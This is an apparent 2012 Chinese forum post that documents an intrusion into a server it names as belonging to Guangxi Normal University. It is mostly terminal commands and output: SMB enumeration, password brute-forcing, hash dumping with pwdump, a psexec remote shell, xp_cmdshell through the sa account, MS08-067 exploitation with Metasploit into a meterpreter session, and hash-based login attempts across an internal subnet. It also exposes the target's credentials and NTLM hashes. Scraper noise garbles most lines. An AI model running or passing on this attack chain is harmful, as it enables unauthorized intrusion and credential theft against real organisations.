nmap+msf入侵广西师范

发表于 2012-12-4 12:46:42
广西师范网站http://202.103.242.241/
: k; s/ z) v) N/ E/ e4 N( ~
$ l2 L1 ^7 `( V( Y5 Croot@bt:~# nmap -sS -sV 202.103.242.241
' n. C* K2 v/ J- g' J4 }1 N$ `, H' k' c" X! T/ ~! |
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST" B6 C$ S( X) L7 y7 t, X8 o' X
9 W2 n- r4 i5 s! @* P
Nmap scan report for bogon (202.103.242.241)
9 p, H$ A) O; _9 C  F) l4 V* Q8 u, `" d/ Q, u1 M/ z
Host is up (0.00048s latency).
2 L) z6 d# k/ Y7 R  V3 R$ P- ^" x; T$ r6 |
Not shown: 993 closed ports8 q9 z1 i  y& x) P+ K/ Y' h
  j( `; B$ e7 U1 k; k
PORT     STATE SERVICE       VERSION
3 Q: r8 k0 I! }, V# C
# Y$ Y$ j8 m9 l: C135/tcp  open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
- S$ ]: a2 N% Q. ?8 I" i4 ~% f$ S" @; h
139/tcp  open  netbios-ssn
" d4 k) C9 t" c2 y
$ J* b% C4 v4 l& x; P& P* N* w445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds6 F5 E# l( H% P0 c% `8 ]: f/ t

, D! S4 a! v; `3 n. n: P1 E1025/tcp open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
# m& x0 {  x7 h3 s/ p+ U1 ~9 c* \, m2 ?
1026/tcp open  msrpc         Microsoft Windows RPC: k; B8 ]3 {- L$ R
4 p( G- _2 s; I; j5 }
3372/tcp open  msdtc?$ \0 u$ {5 n1 m, k

5 B6 @% l/ S5 d1 E2 ]3389/tcp open  ms-term-serv?& o. C4 c: C% ~9 M6 i+ B2 u, f; P

1 B' N5 h& G/ L  T" n! b( Z1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
4 ?# N. l% Q) V! F4 ]/ ESF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
  l' W% l8 ]6 d3 [8 f/ X
& Z/ E$ p/ O. @- ?! s: iSFGetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions/ f+ [, Z, k3 j5 p/ X7 V

; ^& Z! Y) M' ?& X. z" _SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
! v  k; V2 ?; ~" Q; K; n' [% b
2 ?3 Y7 ]6 x' }' g) u+ kSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
6 G1 k$ h5 S" o' c, r, |1 y% z6 O/ V$ Z! {8 V- W
SF:ptions,6,”hO\n\x000Z”);
  q' O. L: O1 N+ d7 q, n& Y% }/ Y3 X: |5 u% V& H
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
2 s, l* L' b: ?' W) Z* P2 G- o) L  b; G' i$ y. b  m5 `
Service Info: OS: Windows" B  k2 o' V: r3 L

9 J, D* [  h' d5 [$ I4 L( X- @Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
+ ?! c* Z5 u+ {- A
6 q1 w; v; D4 B4 TNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
& y4 d+ Q1 p7 g! u
* ]6 o/ o( w( g' M, Lroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  //列出扫描脚本- l: q/ P8 i( v  d& ^; P$ q  w
; q2 S/ j- @2 q1 ?8 ^
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse: H; f8 {+ ^; g5 W
  I* }1 h. H! z! x
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
/ g2 z* p2 o1 Q( f" W, V6 g& P
; ^$ [" m- o; C2 e" E( x: N6 |$ v-rw-r–r– 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse# o; ^6 {2 P- H2 N$ d' [3 o
$ t% _. L$ t: y2 N' m# v& @0 a
-rw-r–r– 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse% ~9 r& }: Z; J) |# b# e" |2 E
, E, C' \3 R8 y2 H
-rw-r–r– 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse: B$ ^# Y! a9 G
& E/ P1 V0 g+ `9 z7 U
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
. I) ]( Z  f" ~' D' D/ ~- a% O" l$ g4 |" h/ W( ]! Z
-rw-r–r– 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
  ~6 C0 x. E7 Z  j. n
8 I' T$ ]* l* G8 D-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
9 `, w- R9 u. P2 j: t0 s2 `* W
& ^! z; f1 I# D4 v# p-rw-r–r– 1 root root  1658 2011-07-09 07:36 smb-flood.nse' f& A' F6 B0 @0 M3 Z
( j- u1 ]0 I5 }' B# h
-rw-r–r– 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse( }* l9 Z. X+ B: ^2 G

4 b' H: f4 G/ W8 P% p; p4 z-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse& A9 n* X" K* c& r) C

- l  L3 X5 B. H6 l% p$ B" }-rw-r–r– 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse" ^! h3 {# |" \. ^2 W- {6 ]5 _
- n, h7 r0 i/ Q2 \% H, M% B: ^
-rw-r–r– 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse! B$ d+ w& l0 [
2 u8 u, M9 h# G" d
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse+ n; i' x! j8 F+ K
9 c- ?5 V% D5 I  Y7 \
-rw-r–r– 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse- j1 F; ]/ }+ H- N( @
% Y2 V& t" J4 f, `/ o
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241   / i' y$ D# o; F+ }! `! [# F6 l2 {
7 I( t0 z8 e# x/ T$ d2 r/ ~
//此乃使用脚本扫描远程机器所存在的账户名: `9 @' D2 W, I' ?, T" r3 o8 C
7 Y" X$ t$ y1 b
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST3 k* D2 x, a5 n% _) s8 L+ z9 y
' F+ `% Z  H. Y6 ~( L1 C& |
Nmap scan report for bogon (202.103.242.241)
$ _  P$ W9 Z3 h' n4 w* g# X
4 y3 n; R+ U7 U1 J) VHost is up (0.00038s latency).
& y8 ]( V7 h6 L% ]+ E" C- b9 g; U: K' K; V  U; P
Not shown: 993 closed ports
, g9 j, Y0 |0 X) l7 [3 P( f& b8 h8 h
PORT     STATE SERVICE
- I" H$ s2 w2 L6 p2 V
2 u6 V3 A/ z0 j4 z& ]% A135/tcp  open  msrpc" }- a  M( S8 H7 c( |, |( k8 c
9 x, C( v, ^8 b: W3 M
139/tcp  open  netbios-ssn0 Q" D& e4 E# k* {$ P
, `  a. Z+ K3 E; B+ W; z3 D
445/tcp  open  microsoft-ds
: F% l. I' [) S$ C+ X3 ?) ~$ j$ h. c
1025/tcp open  NFS-or-IIS
9 _5 r: ~- }$ e* J; c
, u- u' Y% @! b+ e: S1026/tcp open  LSA-or-nterm
  G9 W0 S; Z" N* v
+ h, M8 _- M9 B( {, F. F0 i3372/tcp open  msdtc
" M8 A/ S5 d6 l  c& j
# W2 ]$ Z* ]0 g( s0 |& |# b3389/tcp open  ms-term-serv
: j+ i3 c+ F. _9 I
/ d* @1 O. v1 {. UMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
4 n+ u6 m# a( z' f6 O  R( \8 P& H# z
Host script results:% ]/ }& t1 G, Q$ [: f) \
( _; h& c- t2 Q& b+ ?& p) \2 G; d
| smb-enum-users:, Z/ Q  o& T0 U0 U; t5 `
; D2 l  S2 g" E8 B$ q7 A
|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
, U" i* c9 {/ H# c8 F6 e  J0 c' u# L
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds# y5 {2 v) i0 e* S* N( ]- U
. k' @2 v3 X* T
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 " I5 S! |! k# ]3 R" h

; O( K: F# W: G' v" c" a" V//查看共享( x6 X$ T* {0 B2 @0 I

, a* ]/ ~8 n$ D$ N! b. v9 wStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST. o3 c% j* j% x0 z  i6 P# i
1 m) ^9 E( M% V/ Z
Nmap scan report for bogon (202.103.242.241)
7 ?$ I& l) @1 a4 I' V1 B0 }6 c1 t/ R$ X4 x* q6 W( n
Host is up (0.00035s latency).
4 D0 O0 B" E3 P& A9 ^3 J  V
/ {* \' p- Y" a! yNot shown: 993 closed ports
+ N6 R7 l- R- F# g- D$ m3 B' R) m6 Q+ v% B& f- t" z
PORT     STATE SERVICE
2 d; ]( d* D: T/ T# I2 e, B, d
* M* w2 t% p1 V6 E: x% ~# W: [135/tcp  open  msrpc
" N: z0 Q: u. I7 n/ U
+ r" S" v/ P0 j5 _0 k8 [5 E139/tcp  open  netbios-ssn* p; n6 M# B% A# I, Z

  V3 F0 q. x2 g1 {- x1 O6 j: w445/tcp  open  microsoft-ds, g  I; R! P9 {- _
: x( D$ ?( Z8 u+ x0 m
1025/tcp open  NFS-or-IIS+ c0 i% u2 b( P; m0 i

- G3 B) V8 `* g. V2 j. E7 e1026/tcp open  LSA-or-nterm& n+ }: O, I! j, c" C* A

  o0 {5 m+ w' W* x6 x. S3372/tcp open  msdtc% N1 c, m% q* g+ S& j. t5 [4 w
* u0 Q9 |  s: ~  l
3389/tcp open  ms-term-serv) l6 z1 W; q" S% k
3 R+ ]9 Q6 l7 I3 \1 ]  f8 ]
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)  G. _; `- A3 k( F

2 O+ q2 B' f& e5 h  N! MHost script results:
6 n! s' n# }# e4 g  N9 Y. f
6 ?! s& F1 h7 w% S. e! W. \1 S| smb-enum-shares:7 U9 M* c- [" N" N8 e7 P4 ?

+ z, t- J. H2 D: M|   ADMIN$
1 \: K/ i' v! i- l
0 v1 R2 v+ Q5 |! u% n+ K|     Anonymous access: <none>: A! i9 W! ^( I, {! m% i

, S& G% J. I  |5 Z8 @4 A|   C$
1 e7 K" m1 K# `( T/ a, S  D) l9 i  K7 ]1 ]9 o
|     Anonymous access: <none>" A7 y1 l9 u: @/ _

. o& X* |7 g3 q) Q- e& q|   IPC$( U4 I3 h" C; W

, |* B7 I8 b/ l8 F|_    Anonymous access: READ) _' p! K/ k1 a
2 x- J& N9 W9 I' D6 l" i' b% r( r
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds( @4 ?# _& A2 V# w3 N) Q  `
! [1 D+ Q# h. l- [0 h* H
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241       % M/ E: |" d7 S, C) M9 c& B( E
0 {1 |7 ~7 m6 z2 U+ p( \
//获取用户密码
, `- B4 Y# M7 F8 o$ w- D. E4 G4 p! y. d4 |5 i
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST- X  L1 T, b% Q- c* u& V) @
! L( d3 z4 ]4 M
Nmap scan report for bogon (202.103.242.2418)0 _+ A4 D) R6 Q# z4 g

) [% o- e$ \- K& s& SHost is up (0.00041s latency).! [* s3 [. e# V6 S
+ Y  k+ v: t3 K1 A
Not shown: 993 closed ports
8 {7 z5 e  J; x9 x2 G: m/ i# i! T
PORT     STATE SERVICE
8 @' S3 e) s# F1 x/ Y7 s. \7 O: ]: V$ f) ~" |
135/tcp  open  msrpc
8 j% H* _, N' ]8 I
; p; ?/ F8 L% D139/tcp  open  netbios-ssn, O6 J7 `( I5 L% d

4 X# G- ?# F% [: e' F, C# d445/tcp  open  microsoft-ds* E; r/ Q# x' X6 k" H3 g
+ \% t" Q1 i. u" l8 J9 `) r
1025/tcp open  NFS-or-IIS1 q" Q5 {0 M+ j2 |6 o9 h- C& s
& H6 W! G  C  M& ?0 }
1026/tcp open  LSA-or-nterm
& Z5 ~+ h* g0 h
& L7 {: ^" e' N+ j8 p3372/tcp open  msdtc
. l! _. S6 C; Z! O% L0 h: ?
4 A: E6 }3 m9 M! K4 ^8 T! o3389/tcp open  ms-term-serv& A+ l3 ~' Z  Z* q- n, w

; [  q& `' e, O1 q" ]1 k" d% BMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)0 i. D" Z! V: c; W( Y9 L

) G$ P  r( @: F; ~1 ^/ xHost script results:% j9 L6 N) k; s$ ]+ j

$ W8 Q, w' v+ M: Z7 ]1 ^0 b| smb-brute:
8 G9 ]6 A4 U5 L7 ?5 d. q5 W
9 f* m7 B* u8 E: P% Oadministrator:<blank> => Login was successful
" b, |6 w/ T8 J9 q! p6 p
: F- C: u0 n/ {8 N# L|_  test:123456 => Login was successful0 J; u" r0 X' s: P& g0 C

1 l. ]# |8 O" E- Q# ]  NNmap done: 1 IP address (1 host up) scanned in 28.22 seconds* T- i2 f. w( R) t- V6 P1 L4 Y
( ]# W1 t7 h# {/ p: k3 Y' E
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash9 W4 A9 r! W6 L) M5 x$ @4 v9 r
- c! z- O. D- O* {" I$ [
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
7 O9 r9 Z0 m) r( M6 y: `, E& |' E. ?. P2 |, W9 P$ _6 _% W
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse5 V; G( g5 q4 @2 I) D

- G( H: U8 w) s" X5 xroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1391 \7 r' g. A6 \$ J
/ J1 ~  u1 b0 M2 J) f( v
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST$ Q( w- W4 |: r: x" L5 o
* X' y" K  i) o! P+ s
Nmap scan report for bogon (202.103.242.241)$ N' Q" h/ i- ~3 v  o& W1 ?. J
. @! w( M, L/ `  Z9 x  P
Host is up (0.0012s latency).
, V, }; S- c5 m1 o. x1 i8 M3 V, E
, j& X' F1 e& m9 y4 G: SPORT    STATE SERVICE
3 g) q( J9 i% J0 p3 t! `
, f* P8 ?" A4 {/ s2 I) _3 s2 p135/tcp open  msrpc+ G1 k, E1 A9 }7 U

% v* D( y; y9 _" ?. j0 C139/tcp open  netbios-ssn
- f8 C: A0 x: ?* ^+ w# s8 T
- U  J/ Z) F) U, U445/tcp open  microsoft-ds
5 o' l* f$ w% S7 p
& o! O4 S4 M% N, [; X" A# N0 `MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)# n% ?* Q2 H  E7 Q$ D, P

/ O0 F1 M1 A  k; z/ Y1 JHost script results:' W( g- P4 |# d7 Q; E4 }( I0 X

! ^/ U3 G$ o# X! j9 U2 r| smb-pwdump:( _/ s5 r+ f! g6 d5 }# J3 T
" V  G: e8 u) Z: u
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
* m2 Y/ c" l1 `
$ H. _+ w! ?9 x7 i/ D" b) h4 M| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
- V+ i) U9 H7 t' I
3 r' \- {3 g3 N' W| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4+ a5 n4 n# c% y
2 \% f: `  E6 @/ V+ k9 N
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
6 ]" y$ B6 u9 l: J" F/ f  j9 h5 M. q* j: i2 W/ A
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
- S2 h5 P5 X( G( O, M( t% ^/ c  ]) d/ O% \0 k
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241  -u test             //获取一个cmdshell
1 K' s" |$ e1 y% J/ ?. l* h: T4 c8 x8 B
-p 123456 -e cmd.exe
& D1 {1 n9 D0 o  K$ i+ n/ W3 p8 Y' s% A# B; K) T8 G4 i
PsExec v1.55 – Execute processes remotely, W$ X1 s: c5 k) j7 x/ B

" J( A  z3 o7 |5 uCopyright (C) 2001-2004 Mark Russinovich
( _# Z% ]( e8 G9 e# d. a
( g8 @7 Y9 q, X& a7 DSysinternals – www.sysinternals.com2 e# H2 Y1 [4 B2 {: z

$ c7 g) ~  R  t% f+ t8 UMicrosoft Windows 2000 [Version 5.00.2195]
! W& C) \9 D0 V: K: @. Z# F9 {: w, d2 C# V
(C) 版权所有 1985-2000 Microsoft Corp.
- ^- v( b. i9 D( ]$ i+ \
8 S9 o( s# Z: f# cC:\WINNT\system32>ipconfig; _! W3 O0 Q5 {" q' I! a

9 s7 J' E; x1 H( d, xWindows 2000 IP Configuration& \; o9 N+ `9 p- t/ Y$ x! g  k1 T
+ `5 i1 }) Q% c) \
Ethernet adapter 本地连接:
3 z0 U1 c, x+ ^/ s: @) q+ H- x' D6 i, Q  I' Y* k* c/ \
Connection-specific DNS Suffix  . :
8 Y- |5 P0 l9 V: U/ G3 e# p' ~1 ~0 n8 }3 I$ |- _/ H
IP Address. . . . . . . . . . . . : 202.103.242.241
4 e, G+ m. f) b! b0 u) Y* ]% V' B7 E3 k- X" @
Subnet Mask . . . . . . . . . . . : 255.255.255.0% Q6 j0 X: r4 F- T

3 q% \) @  P7 }& F- mDefault Gateway . . . . . . . . . : 202.103.1.1; [' K; P: b; ^! z7 k3 P
# h  j' j- g4 G  e( ^) z' m
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “   //远程登录sa执行命令
* n% T4 B/ f+ a, h1 w% i' v" R) `, e6 u' J  g
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241     //检测目标机器漏洞4 w- u. I% ~9 }, W

/ z; V9 x2 q* w5 P9 dStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST* }( [! r: H+ i" S7 i1 O. _
  u/ O! a+ Q& [/ w! U+ `" v
Nmap scan report for bogon (202.103.242.241)
: ~6 t  x4 Z0 I) ~! N! @  [
: `  Q! u& o' L$ VHost is up (0.00046s latency).
2 B4 Y. u1 m2 q; U2 b! x
6 w9 W9 r' ?0 T8 uNot shown: 993 closed ports
1 |* s+ j4 C$ j
5 w, |# ~$ `* l5 d7 }) VPORT     STATE SERVICE
; l8 ^  L  f0 `/ y) C3 o
& B( _& Z" [, U5 F1 d2 r. q135/tcp  open  msrpc
+ D2 R8 R. h& B$ D
, {0 E% {  S: U# w6 J5 y139/tcp  open  netbios-ssn  \/ m. o& \2 t7 R, d

% V0 {7 P+ G% u) `$ K. j0 G8 b- o445/tcp  open  microsoft-ds
( b9 t! K3 _1 |! J" w0 X; l  X
1025/tcp open  NFS-or-IIS
  o- R. |. B6 [7 }9 c. J' r' @
& i7 N& ^- N/ F" J+ q  b1 I$ Z1026/tcp open  LSA-or-nterm
0 ^9 ]# Q0 O7 N/ k! `, g5 T
& Q: Z/ u# D, Y  _3372/tcp open  msdtc0 h& F3 I% i) @) |" @. U8 _
) O( l6 ^7 M. u
3389/tcp open  ms-term-serv
- l, Z2 T! n; c6 [4 A2 a' U
! s8 h- ]8 U- h  {+ BMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
0 w% f3 ?& ]3 R, I' z* V- J/ h# D* l8 N- B& C7 N
Host script results:
* _. Y% Z2 [; n& P. u5 G/ Q4 \2 t. k" D0 |( T, T9 |
| smb-check-vulns:- c2 e" m" Z3 i8 p' y0 ~' _3 ?% f  n
" t; _/ y6 _1 E# r- Q
|_  MS08-067: VULNERABLE
3 b& ~5 U. J' Y  i. z8 i- |8 O8 B9 Q: `
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
6 S7 v" b# \* L2 S8 f
" M4 G5 D& Q& troot@bt:~# msfconsole                                             //在msf上利用ms08-067漏洞对目标机器进行溢出
. l# X5 L. {# m6 h5 y: e
% a, C. Z2 s7 c- Gmsf > search ms08. E+ H: @  E( r1 e" E0 a. w3 u" O

# x; T3 P; Q% {  `# U2 {- Vmsf > use exploit/windows/smb/ms08_067_netapi
+ x; Y# `- b: w" Z! ?& H  m3 @) Q( s- u1 A- C
msf  exploit(ms08_067_netapi) > show options7 q& O) Q8 F: N9 G) W: U" r
% E5 `* G$ \$ u( [
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241% Q# ^* l! I3 Z5 T

( b5 v7 P" G9 c) l# j: d/ K7 cmsf  exploit(ms08_067_netapi) > show payloads+ P; H! X5 G% k2 G4 a

0 ?& U5 z( K- R2 ~# ^/ }( Z5 Ymsf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp6 L6 G# t6 B( @8 i2 H+ ]

$ R; S4 M& F4 I) ]  n5 q1 M' e5 zmsf  exploit(ms08_067_netapi) > exploit
& P; L9 _+ n5 y6 s; V+ E6 S, R/ q3 M8 O4 u
meterpreter >0 |1 ?1 h3 M) X6 {* i  C' ?5 [

% [2 [, `7 _! dBackground session 2? [y/N]  (ctrl+z)
( T! V* ^3 `; {" `. |- U/ v
- q+ z1 U& }/ Z3 E6 D5 `. Gmsf  exploit(ms08_067_netapi) > sessions -l' K6 ]  b6 P( z6 B$ W7 p" P
- m! s' ]: d6 r! X
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt6 R  X3 r/ N7 l/ h1 @0 \
. ]' ~. W6 L/ ]1 n7 q+ L! M
test
3 p1 [: ?1 U6 @. n3 r5 y' V, T  b1 o( A" w( L
administrator# O) G+ C7 f/ T, C

3 N  l; r/ I& ^' F% o0 h2 {root@bt:/usr/local/share/nmap/scripts# vim password.txt5 x" d2 q0 y2 z! Q2 U4 f( q
5 W/ j: f' P6 @% J* N8 |" H+ K- R
44EFCE164AB921CAAAD3B435B51404EE2 z9 V; G, {* \! v

' ]9 z2 H" V# T' @; troot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
. {! E; s# P! r% l/ s4 s2 s3 y8 ?* d
//利用用户名跟获取的hash尝试对整段内网进行登录
- P0 s) y; j8 {& C2 f  ^" f% f1 w
Nmap scan report for 192.168.1.105
& I0 Z8 z" h$ C  a
1 o2 R* y+ W0 e- b5 b. X( UHost is up (0.00088s latency).
) c' e9 ^3 H0 D9 J, w; a1 G6 m+ R) ]9 I# w! h% }& ~3 N
Not shown: 993 closed ports& ^3 n0 R+ c% r* H$ n

  |; T, a5 `3 ~0 i7 p( U# `/ i. \PORT     STATE SERVICE/ Q- W& b# b& y/ J0 N

  ~. `9 d3 o+ |% }) B135/tcp  open  msrpc
0 s5 V3 l+ D% g3 ]( ~4 }
6 R  J7 V" b( U( k' c; f+ d3 J6 L139/tcp  open  netbios-ssn
) x6 d7 L5 G6 C+ ]; H. i, j7 L2 c
/ f' Y5 _8 i' W$ i: N! J445/tcp  open  microsoft-ds* @6 d; l& t/ U3 r% O2 c

) M+ k+ I# [- t2 E1025/tcp open  NFS-or-IIS0 ~+ _+ v: @9 x, s9 i! \8 J8 u" I

+ ^0 c. Y; t9 f5 g8 u1026/tcp open  LSA-or-nterm
* d9 K8 z  F  D; X4 }
6 _, f4 k" y5 ^" W1 V1 T+ {5 o, U! D% \% A2 R3372/tcp open  msdtc
7 v4 n* K; N0 w) Q
2 T( \/ c9 |5 s7 ^" B8 t" I3389/tcp open  ms-term-serv
2 W, q1 }+ H8 a8 k
4 ^# P# L7 M" kMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)0 f4 W* O/ k; L) k
' x$ V- Z/ G* X$ X) |# m) p
Host script results:/ y% j4 {5 C0 b
% Z" Q* p+ N2 D& W1 b
| smb-brute:
/ l1 x2 t% p9 O' G' ?9 D: u" [. G5 L, Z6 x4 K
|_  administrator:<blank> => Login was successful) E" H/ C& G! S7 ]* b* p
# q5 ~. M/ k# G6 t# A0 r
攻击成功,一个简单的msf+nmap攻击~~·
3 Q9 m+ l) J! L3 B/ G8 c* M* k( j( |: p) {